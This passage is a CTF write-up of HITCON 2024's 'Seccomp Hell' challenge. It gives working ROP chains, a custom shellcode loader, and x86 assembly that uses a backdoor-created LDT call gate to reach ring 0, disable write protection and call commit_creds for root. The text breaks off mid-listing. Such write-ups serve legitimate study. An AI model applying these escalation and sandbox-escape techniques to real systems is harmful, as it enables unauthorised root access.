Tags: seccomp ldt userland kernel sandbox pwn 

Rating: 5.0

# Seccomp Hell

> Some challenges are userland pwns, others are kernel pwns, still others are sandbox escapes.
> In Seccomp Hell, you can get all three for free <3
>
> Note: Try getting a full root shell for this challenge
>
>
> [Dist](https://storage.googleapis.com/hitcon-ctf-2024-qual-attachment/seccomphell/seccomphell-fe8e817a92294a8810182a9c9737d83083554b61.tar.gz)

## TL;DR
You need to exploit three parts in this challenge:

1. userland exploitation
a backdoor that accepts a ROP chain, which can be used to get arbitrary code execution

2. kernel backdoor
a backdoor that creates a CALL GATE in the LDT (Local Descriptor Table) to get kernel mode escalation and write kernel shellcode

3. sandbox escape
disable seccomp and escalate privileges through kernel shellcode (corrupt the current task_struct)

## Overview

Judging from the challenge description there will be at least three parts:
1. userland exploitation
2. kernel exploitation
3. sandbox escape (seccomp)

The challenge consists of only three files:
```txt
dist
├── bzImage
├── initramfs.cpio.gz
└── run.sh
```

A simple run.sh script:
```bash
#!/bin/bash

qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
    -monitor /dev/null \
    -nographic \
    -netdev user,id=net0,hostfwd=tcp::22222-:22222 \
    -device e1000,netdev=net0 \
    -no-reboot
```

One important aspect is that `+smep` (Supervisor Mode Execution Prevention) is missing from the CPU flags ... *foreshadowing*

Also, here is an explanation of the [kernel parameters](https://docs.kernel.org/admin-guide/kernel-parameters.html):

+ console=ttyS0
console output options, nothing interesting, use `context.newline = b'\r\n'`

+ loglevel=3
reduce the amount of logging, can be increased or removed for easier debugging

+ oops=panic
immediately panic on every kernel oops, meaning our kernel exploit needs to be precise

+ panic=-1
immediately reboot on kernel panic, so we can't just keep corrupting from another socket connection (not that we necessarily wanted to do that anyway)

+ pti=on
enable Page Table Isolation (so no CPU side channel)

We can decompress the initramfs.cpio.gz file using something similar to this [script](https://github.com/gfelber/how2keap/blob/main/scripts/decompress.sh).

Let's first look at the init script:

/init

<details>

```bash
#!/bin/sh

chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f
```

</details>

OK, we now know that our vulnerable userland binary is `/home/user/i_am_not_backdoor.bin` and the vulnerable kernel module is `/usr/lib/modules/i_am_definitely_not_backdoor.ko`, accessible through `/dev/i_am_definitely_not_backdoor`.

## Test Environment

I used two of my tools to set up my test environment:
+ [vagd](https://github.com/gfelber/vagd) to exploit the userland binary
+ [how2keap](https://github.com/gfelber/how2keap) as a template for the kernel exploitation part

This is what my setup looks like:

```txt
seccomp_hell
├── Makefile
├── bins
│   ├── i_am_definitely_not_backdoor.ko
│   └── i_am_not_backdoor.bin
├── exploit.py
├── libs
│   ├── pwn.h
│   ├── util.c
│   └── util.h
├── pwn.c
├── rootfs
│   ├── ...
├── scripts
│   ├── build.sh
│   ├── compress.sh
│   ├── decompress.sh
│   ├── gdbinit
│   └── start-qemu.sh
└── share
    ├── bzImage
    ├── flag.txt
    ├── initramfs.cpio.gz
    ├── rootfs.cpio.gz -> initramfs.cpio.gz
    └── run.sh
```

## Userland

Let's first get some basic information:

file:
```
bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped
```

checksec:
```
[*] './i_am_not_backdoor.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0
```

[seccomp-tools](https://github.com/david942j/seccomp-tools) dump:

<details>

```
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000002a  if (A != connect) goto 0017
 0016: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0017: 0x15 0x00 0x01 0x0000009a  if (A != modify_ldt) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0021
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0021: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0023
 0022: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0023: 0x06 0x00 0x00 0x00000000  return KILL
```

</details>

Hmm, so interesting syscalls are allowed that are important for writing an assembly payload (`mmap`, `mprotect`), and `open` allows us to open the vulnerable kernel module. Also, for some reason a syscall called `modify_ldt` is whitelisted ... *foreshadowing*

### Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return pointer and jumps to a backdoor function using ROP: the `CALL` pushes the address of the next instruction onto the stack, the `ADD` adjusts that saved value so it points at the backdoor, and the final `RET` returns into it:

```asm
        CALL   LAB_004018d1
LAB_004018d1:
        ADD    qword ptr [RSP]=>local_1e0, offset backdoor
        PUSH   RBP
        MOV    RBP, RSP
        LEAVE
        RET
```

The reversed backdoor code:
<details>

```c
#define EXAMINE_SYSCALL \
  BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
  BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \
  BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

#define KILL_PROCESS \
  BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL)

void backdoor() {

  char rop[0];

  read(STDIN_FILENO, rop, 0x98);
  close(STDIN_FILENO);
  close(STDOUT_FILENO);
  close(STDERR_FILENO);

  struct sock_filter seccomp_filter[] = {
    EXAMINE_SYSCALL,
    ALLOW_SYSCALL(read),
    ALLOW_SYSCALL(write),
    ALLOW_SYSCALL(open),
    ALLOW_SYSCALL(close),
    ALLOW_SYSCALL(mmap),
    ALLOW_SYSCALL(mprotect),
    ALLOW_SYSCALL(socket),
    ALLOW_SYSCALL(connect),
    ALLOW_SYSCALL(modify_ldt), // foreshadowing
    ALLOW_SYSCALL(exit),
    ALLOW_SYSCALL(exit_group),
    KILL_PROCESS,
  };

  struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
    .filter = (struct sock_filter*)&seccomp_filter,
  };

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}
```

</details>

The backdoor can be summarized like this:

1. read a buffer overflow (the ROP chain) using `read`

2. close STDIN, STDOUT and STDERR

3. set up a seccomp filter whitelist

Let's take a look at the opened files before they are closed:
```
ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------ 1 user users 64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 3 -> socket:[385]
lrwx------ 1 user users 64 Jul 12 17:12 4 -> socket:[386]
lrwx------ 1 user users 64 Jul 12 17:12 5 -> /dev/ttyS0
```

Interesting, the standard fds simply point to `/dev/pts/0`, so what happens if we just open it again ... we regain a working STDIN.

> Note: /dev/pts/0 increments if there are multiple consecutive connections; this was briefly a problem while the instance spawner was temporarily replaced with a shared instance.

> Note: this approach was unintended, the intended solution opened a socket connection using the allowed socket and connect syscalls

So let's write a simple payload that reopens `/dev/pts/0`, writes a new ROP payload into a known memory address and pivots there.

Stage 1:

<details>

```python
linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b''

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)
```

</details>

### Stage 2: pivot ROP

Now that we have more control over the ROP chain, we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

<details>

```python
linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
    0: std,
    0x10: b'STAGE 2',
    0x18: b'STAGE 3',
    0x20: b'FAIL',
    0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)
```

</details>

### Stage 3: loader

At this point we realized that certain characters, e.g. `\n` and `\x04` (End of Transmission), can't be sent. That's why we added another loader stage that decodes the payload and writes it into executable memory.

<details>

```python
payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
{shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
xor rbx, rbx
LOAD:
// get two characters (one byte)
push 0
{shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
cmp rax, 2
jl FAIL
pop rax
sub ah, 0x41
sub al, 0x41
shl al, 2
shl al, 2
shr rax, 2
shr rax, 2
mov BYTE PTR [rbx+{PAYLOAD}], al
inc rbx
cmp rbx, {PAYLOAD_LEN}
jb LOAD

// jmp to next stage
mov rax, {PAYLOAD+0x20}
jmp rax

FAIL:
{shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
int 3
"""))

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
# hex starting a 'A'
# and least significant nibble first

payload_enc = b''
for b in payload:
    lo = (b & 0xf) + 0x41
    hi = ((b & 0xf0) >> 4) + 0x41
    payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

it()
```

</details>
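
As a sanity check for this scheme, here is a stand-alone sketch (my own illustration, not part of the exploit) of the custom encoding next to a Python mirror of the loader's decode loop; the encoded alphabet is 'A'..'P', so the problematic bytes can never appear:

```python
def encode(data: bytes) -> bytes:
    # each byte becomes two chars in 'A'..'P', least significant nibble first
    out = bytearray()
    for b in data:
        out.append((b & 0x0f) + 0x41)         # low nibble
        out.append(((b >> 4) & 0x0f) + 0x41)  # high nibble
    return bytes(out)

def decode(enc: bytes) -> bytes:
    # mirror of the loader: byte = ((hi - 'A') << 4) | (lo - 'A')
    return bytes(((hi - 0x41) << 4) | (lo - 0x41)
                 for lo, hi in zip(enc[0::2], enc[1::2]))

blob = bytes(range(256))
assert decode(encode(blob)) == blob
assert not any(c in b'\n\x04' for c in encode(blob))  # bad chars unreachable
```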

This basically finishes the userland exploitation stage.

## Kernel

Let's get into the interesting part: the kernel. Let's reverse the backdoor.

Simplified reversed backdoor:

<details>

```c
int backdoor_open(void) { return 0; }
int backdoor_read(void) { return 0; }

int backdoor_write(void) {
  void* pte;
  pte_t* pte_lock;

  // check if ldt exists (flip-flops between two addresses)
  int rc = follow_pte(const_pcpu_hot + 0x8f8, 0xffff880000010000, &pte, &pte_lock);
  if (rc != 0)
    return -EFAULT;

  // map ldt page for write
  char *ldt = vmap(pages, 1, 4, 0x8000000000000163);
  if (ldt == 0)
    return -EFAULT;

  // corrupt ldt entry 12

  ldt[0x60] = 0;
  ldt[0x61] = 0;

  ldt[0x65] = 0xec; // call gate
  ldt[0x66] = 0xc0;
  ldt[0x67] = 0;

  vunmap(ldt);

  return 0;
}

static struct file_operations BACKDOOR_fops = {
  .owner = THIS_MODULE,
  .open = backdoor_open,
  .read = backdoor_read,
  .write = backdoor_write,
};

static struct miscdevice backdoor_device = {
  .minor = MISC_DYNAMIC_MINOR,
  .name = "i_am_definitely_not_backdoor",
  .fops = &BACKDOOR_fops,
};

int init_module(void) {
  misc_register(&backdoor_device);
  return 0;
}

void cleanup_module(void)
{
  misc_deregister(&backdoor_device);
}

int backdoor_release(void)
{
  return 0;
}

module_init(init_module);
module_exit(cleanup_module);
```

</details>

So this basically checks if a kernel page exists at 0xffff880000010000, and if that is the case it overwrites something at offset 0x60 in it. Directly calling this kernel module fails, so how do we allocate something in this page? Well, this is where the foreshadowing comes into play: the mysterious syscall `modify_ldt` actually allocates into this page.

> Note: modify_ldt actually flip-flops the LDT pages between two addresses on every call, so we need to call modify_ldt twice for this to work.

So what is the LDT and how does it work? The LDT or Local Descriptor Table is a feature similar to the GDT (Global Descriptor Table) that holds segment descriptors. These can be used to give certain memory segments additional permissions like read, write and execute, but also system functionality like call, trap and interrupt gates (e.g. interrupt gates are used for syscalls). However, `modify_ldt` can't create system descriptors: it always sets the S flag, marking the entry as a plain code/data segment. Additional info can be found in the [intel bible](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf).
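
To see the flip-flop from plain userland, here is a minimal ctypes sketch (my own illustration, assuming an x86-64 Linux host; the exploit later does the same thing in shellcode) that installs the same LDT entry twice:

```python
import ctypes
import struct

libc = ctypes.CDLL(None, use_errno=True)
SYS_modify_ldt = 154

# struct user_desc: entry_number, base_addr, limit, then all the
# one/two-bit fields packed into the fourth int (all zero here)
desc = struct.pack('<IIII', 12, 0x8899aabb, 0xdeeff, 0)

# func 0x11 = write an entry; every call can move the kernel's LDT page
# between its two alternating addresses, hence we call twice so it ends
# up on the page the backdoor probes
for _ in range(2):
    ret = libc.syscall(SYS_modify_ldt, 0x11, desc, len(desc))
    assert ret == 0, ctypes.get_errno()
```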

So let's understand an LDT entry; we can set the following options:

[include/uapi/asm/ldt.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/uapi/asm/ldt.h#L21)
```c
struct user_desc {
	unsigned int  entry_number;
	unsigned int  base_addr;
	unsigned int  limit;
	unsigned int  seg_32bit:1;
	unsigned int  contents:2;
	unsigned int  read_exec_only:1;
	unsigned int  limit_in_pages:1;
	unsigned int  seg_not_present:1;
	unsigned int  useable:1;
#ifdef __x86_64__
	/*
	 * Because this bit is not present in 32-bit user code, user
	 * programs can pass uninitialized values here. Therefore, in
	 * any context in which a user_desc comes from a 32-bit program,
	 * the kernel must act as though lm == 0, regardless of the
	 * actual value.
	 */
	unsigned int  lm:1;
#endif
};
```

which needs to be translated into this struct:

[include/asm/desc_defs.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/desc_defs.h#L66):
```c
struct desc_struct {
	u16	limit0;
	u16	base0;
	u16	base1: 8, type: 4, s: 1, dpl: 2, p: 1;
	u16	limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));
```

using this translation function.

[include/asm/desc.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/desc.h#L16):
```c
static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
{
	desc->limit0 = info->limit & 0x0ffff;

	desc->base0  = (info->base_addr & 0x0000ffff);
	desc->base1  = (info->base_addr & 0x00ff0000) >> 16;

	desc->type   = (info->read_exec_only ^ 1) << 1;
	desc->type  |= info->contents << 2;
	/* Set the ACCESS bit so it can be mapped RO */
	desc->type  |= 1;

	desc->s      = 1;
	desc->dpl    = 0x3;
	desc->p      = info->seg_not_present ^ 1;
	desc->limit1 = (info->limit & 0xf0000) >> 16;
	desc->avl    = info->useable;
	desc->d      = info->seg_32bit;
	desc->g      = info->limit_in_pages;

	desc->base2  = (info->base_addr & 0xff000000) >> 24;
	/*
	 * Don't allow setting of the lm bit. It would confuse
	 * user_64bit_mode and would get overridden by sysret anyway.
	 */
	desc->l      = 0;
}
```

As mentioned, we can't create a system segment ourselves (the S flag is always set to 1 by `fill_ldt`). So let's create an entry at index 12 (byte offset 0x60) and see what happens.

example:
```c
struct user_desc ldt = {
  .entry_number = 12,        // max 0x1ffe
  .base_addr = 0x8899aabb,   // 32 bits
  .limit = 0xdeeff,          // 20 bits
  .contents = 0,             // 2 bits
  .read_exec_only = 0,       // 1 bit
  .seg_not_present = 0,      // 1 bit
  .useable = 0,              // 1 bit
  .seg_32bit = 0,            // 1 bit
  .limit_in_pages = 0,       // 1 bit
};

SYSCHK(syscall(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));
```
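
As a sanity check, here is a small Python reimplementation of `fill_ldt` (a sketch following the `desc_struct` bitfield layout above); for the example entry it reproduces exactly the qword shown in the "before corrupt" dump below:

```python
def fill_ldt(base_addr, limit, contents=0, read_exec_only=0,
             seg_not_present=0, useable=0, seg_32bit=0, limit_in_pages=0):
    type_ = ((read_exec_only ^ 1) << 1) | (contents << 2) | 1  # ACCESS bit
    desc  = limit & 0xffff                    # limit0
    desc |= (base_addr & 0xffff) << 16        # base0
    desc |= ((base_addr >> 16) & 0xff) << 32  # base1
    desc |= type_ << 40                       # type
    desc |= 1 << 44                           # s = 1: code/data, not system
    desc |= 3 << 45                           # dpl = 3
    desc |= (seg_not_present ^ 1) << 47       # p
    desc |= ((limit >> 16) & 0xf) << 48       # limit1
    desc |= useable << 52                     # avl (l at bit 53 forced to 0)
    desc |= seg_32bit << 54                   # d
    desc |= limit_in_pages << 55              # g
    desc |= ((base_addr >> 24) & 0xff) << 56  # base2
    return desc

assert fill_ldt(0x8899aabb, 0xdeeff) == 0x880df399aabbeeff
```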

before corrupt:
```
0xffff880000010060: 0x880df399aabbeeff
0xffff880000010060: 0xeeff 0xaabb 0xf399 0x880d
0xffff880000010060: 0xff 0xee 0xbb 0xaa 0x99 0xf3 0x0d 0x88

desc_struct {
  .limit0 = 0xeeff
  .limit1 = 0xd
  .base0 = 0xaabb
  .base1 = 0x99
  .base2 = 0x88
  .type = 0x3 (contents=0, ACCESS=1, read_exec_only=0)
  .s = 1
  .dpl = 3
  .p = 1
  .avl = 0
  .l = 0
  .d = 0
  .g = 0
}
```

after corrupt:
```
0xffff880000010060: 0x00c0ec99aabb0000
0xffff880000010060: 0x0000 0xaabb 0xec99 0x00c0
0xffff880000010060: 0x00 0x00 0xbb 0xaa 0x99 0xec 0xc0 0x00

desc_struct {
  .limit0 = 0x0
  .limit1 = 0x0
  .base0 = 0xaabb
  .base1 = 0x99
  .base2 = 0x00
  .type = 0xc (contents=3, ACCESS=0, read_exec_only=1)
  .s = 0
  .dpl = 3
  .p = 1
  .avl = 0
  .l = 0
  .d = 1
  .g = 1
}
```

So it looks like the backdoor actually creates a system segment for us. Let's look at the table to understand what system segment type we have.

**System-Segment and Gate-Descriptor Types**:

| Type (Hex) | Bit 11 | Bit 10 | Bit 9 | Bit 8 | 32-Bit Mode | IA-32e Mode |
|-|-|-|-|-|-|-|
| 0x0 | 0 | 0 | 0 | 0 | Reserved | Upper 8 bytes of a 16-byte descriptor |
| 0x1 | 0 | 0 | 0| 1 | 16-bit TSS (Available) | Reserved|
| 0x2 | 0 | 0 | 1 | 0 | LDT | LDT |
| 0x3 | 0 | 0 | 1 | 1 | 16-bit TSS (Busy) | Reserved|
| 0x4 | 0 | 1 | 0 | 0 | 16-bit Call Gate | Reserved|
| 0x5 | 0 | 1 | 0 | 1 | Task Gate | Reserved|
| 0x6 | 0 | 1 | 1 | 0 | 16-bit Interrupt Gate | Reserved|
| 0x7 | 0 | 1 | 1 | 1 | 16-bit Trap Gate | Reserved|
| 0x8 | 1 | 0 | 0 | 0 | Reserved | Reserved|
| 0x9 | 1 | 0 | 0 | 1 | 32-bit TSS (Available) | 64-bit TSS (Available)|
| 0xa | 1 | 0 | 1 | 0 | Reserved | Reserved|
| 0xb | 1 | 0 | 1 | 1 | 32-bit TSS (Busy) | 64-bit TSS (Busy)|
| **0xc** | **1** | **1** | **0** | **0** | 32-bit Call Gate| **64-bit Call Gate**|
| 0xd | 1 | 1 | 0 | 1 | Reserved | Reserved|
| 0xe | 1 | 1 | 1 | 0 | 32-bit Interrupt Gate | 64-bit Interrupt Gate|
| 0xf | 1 | 1 | 1 | 1 | 32-bit Trap Gate | 64-bit Trap Gate|

And the backdoor created a 64-bit Call Gate for us.
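
Decoding the corrupted qword as the low half of a 16-byte 64-bit call gate (a quick sketch based on the gate layout in the Intel SDM) also explains two choices we'll make later: the trampoline gets linked at 0xc00000, and `user_desc.base_addr` must hold `__KERNEL_CS`:

```python
def decode_call_gate_low(q):
    # split the low 8 bytes of a 16-byte 64-bit call gate descriptor
    return {
        'offset_15_0':   q        & 0xffff,
        'selector':     (q >> 16) & 0xffff,  # overlaps desc_struct.base0
        'type':         (q >> 40) & 0xf,
        'dpl':          (q >> 45) & 0x3,
        'present':      (q >> 47) & 0x1,
        'offset_31_16': (q >> 48) & 0xffff,
    }

g = decode_call_gate_low(0x00c0ec99aabb0000)
assert g['type'] == 0xc and g['dpl'] == 3 and g['present'] == 1

# the selector slot overlaps base_addr[15:0], so the exploit will pass
# base_addr = __KERNEL_CS; here it still holds 0xaabb from the example
assert g['selector'] == 0xaabb

# the backdoor's 0xc0/0x00 writes land in offset[31:16] -> entry point
# 0xc00000, which is where the ring-0 trampoline gets linked;
# offset[63:32] comes from the next (zeroed) LDT entry
assert (g['offset_31_16'] << 16) | g['offset_15_0'] == 0xc00000
```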

#### Stage 4: kernel backdoor, LDT call gate

A call gate is an x86 feature that allows switching between privilege levels, similar to syscalls (interrupt gates).

After realizing this we found this [super cool writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/) by hlt about his challenge one_byte from hxp CTF 2022, which talks about using call gates (while dealing with SMAP) to get CPL 0 (ring 0) code execution.

> Note: this wouldn't work if SMEP was enabled, because you can't temporarily disable SMEP without direct access to CR4 afaik

With a few adjustments we can create a privilege escalation PoC:
<details>

diff from one_byte solution:
```diff
1c1,2
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
---
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
>
91,94d91
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
96c93,97
< // TODO: Check that &ring0 == 0x401000
---
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
>
>
> // TODO: Check that &ring0 == 0xc00000
136,142c137,155
< // Set current->cred and current->real_cred to init_task->cred
< addq $KASLR_INIT_TASK, %rdx
< movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
< addl $2, STRUCT_CRED_USAGE(%rdx)
< movq %gs:PERCPU_CURRENT, %rax
< movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
< movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
---
> // get .text base
> subq $(KASLR_WRITE_TO+0x400000), %rdi
> andq $(~0xfffff), %rdi
> movq %rdi, %r15
>
> // privilige escalation
> // crpt_cred = prepare_cred();
>
> lea PREPARE_CREDS(%r15), %rax
> call *%rax
>
> // crpt_cred.uid = 0;
> // crpt_cred.gid = 0;
> movq %rax, %rdi
> movq $0, 8(%rdi)
>
> // commit_creds(crpt_cred);
> lea COMMIT_CREDS(%r15), %rax
> call *%rax
204c217
< asciz module_path, "/dev/one_byte"
---
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
256c269,270
< exit_64 $0
---
> movq $0, %rdi
> check_syscall_64 $SYS_exit
258a273
>
```

Privilege escalation PoC:
```asm
// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn

#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
negl %eax
movl $SYS_exit_group, %eax
syscall
ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
movl \nr, %eax
syscall
test \res, \res
js __syscall_64_fail.L
.endm

.macro var name:req
.pushsection .data
.balign 8
.local \name
\name:
.endm

.macro endvar name:req
.local end_\name
end_\name:
.eqv sizeof_\name, end_\name - \name
.popsection
.endm

.macro asciz name:req, data:vararg
var \name
.asciz \data
endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
var \name
.int \offset
.short \selector
endvar \name
.endm

.macro fn name:req
.text
.code64
.global \name
\name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL 0b000
#define RPL_USER 0b011
#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
// 0x0000000000401000 <- ring0
// 0x00000000ffdfffff
// |||\___/
// ||| \____ limit
// \/\_______ G, D, 0, AV
// \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0

// TODO: Check that &ring0 == 0xc00000
fn ring0
// Disable interrupts (interrupts cause double faults right now)
cli

// Read LSTAR to bypass KASLR
movl $MSR_LSTAR, %ecx
rdmsr
shlq $32, %rdx
orq %rax, %rdx
subq $KASLR_LSTAR, %rdx
movq %rdx, %rbp

// Disable WP
movq %cr0, %r8
andq $(~(1 << 16)), %r8
movq %r8, %cr0

// Copy stage 2 to the mapped kernel entry point
movq %rbp, %rdi
addq $KASLR_WRITE_TO, %rdi
movq %rdi, %r15
leaq ring0_stage2(%rip), %rsi
movl $sizeof_ring0_stage2, %ecx
rep movsb

// Jump there.
jmp *%r15

var ring0_stage2
// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq %cr3, %rbx

// Switch to the kernel page table.
andq $(~PTI_SWITCH_MASK), %rbx
movq %rbx, %cr3

// get .text base
subq $(KASLR_WRITE_TO+0x400000), %rdi
andq $(~0xfffff), %rdi
movq %rdi, %r15

// privilige escalation
// crpt_cred = prepare_cred();

lea PREPARE_CREDS(%r15), %rax
call *%rax

// crpt_cred.uid = 0;
// crpt_cred.gid = 0;
movq %rax, %rdi
movq $0, 8(%rdi)

// commit_creds(crpt_cred);
lea COMMIT_CREDS(%r15), %rax
call *%rax

// Swap back
swapgs

// Switch the page table back around
